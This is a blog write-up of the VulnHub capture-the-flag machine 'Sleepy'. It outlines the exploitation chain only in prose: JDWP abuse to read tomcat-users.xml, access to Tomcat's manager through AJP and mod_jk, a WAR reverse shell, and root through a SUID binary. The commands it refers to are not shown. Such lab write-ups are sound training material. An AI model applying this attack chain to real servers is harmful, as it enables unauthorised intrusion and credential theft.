I woke up again at 3 AM so it was... a good time to finish one of the CTF(s) I started few weeks ago - this one is called Sleepy ;) . Machine you can find online thanks to VulnHub Team. Below few details from the journey...
When machine is ready, we should be somewhere here:
When I saw JDWP enabled I decided to switch to Metasploit and use one of the exploits available there:
I decided to read few more pages about JDWP[1, 2, 3, 4]. Now it was time to verify found hints. :)
Checking prdelka's paper:
So far so good. More docs to read:
Let's try to check the next found open port - 8009/tcp. Some hints you will find on Wiki:
Ok, let's prepare our mod_jk (basing on this article - thanks!):
Restarting apache2 and checking our 'settings':
Looks like now we can access /manager/.
After a while you'll see that bruteforcing manager's password is pointless. So I was wondering if there is any other way to grab tomcat's password list... Let's get back to our JDWP port.
According to the links mentioned before ([1, 2, 3, 4, ) we'll get the list of available threads:
Now (after I was looking for a tomcat-users.xml file location) I modified payload available here
to read the content of the file:
...and again... ;]
I was wondering if I need to copy user-file via ftp? Checking:
So no luck, need to try something else...
Maybe some grep? ;)
"Great, password!" but can you see this nice string at the beginning? ("<-- " ;))
At this stage I stuck for a while. But then I decided to read the file backwards (line by line):
Good, so now we have a 'tomcat' password and we can access Tomcat's /manager/... ;)
My next step was: to generate WAR shell using venome.sh and deploy it to "remote" (on our 127.0.0.1) host:
Preparing WAR webshell:
And after visiting 'new link' we should see our reversed shell in meterpreter's windows:
Cool. Let's find some SUID files:
As you can see there is a nightmare binary:
Checking with strings:
Ok, again. I prepared new session/warfile:
Next step: exporting function in bash:
Unfortunately I wasn't able to grab root-shell...
... until kill with proper signal was used (in 2nd (session) console):
Great, rootshell :)
It was a great CTF. Big thanks goes to the author!
Also big thanks goes to VulnHub for sharing all of those games.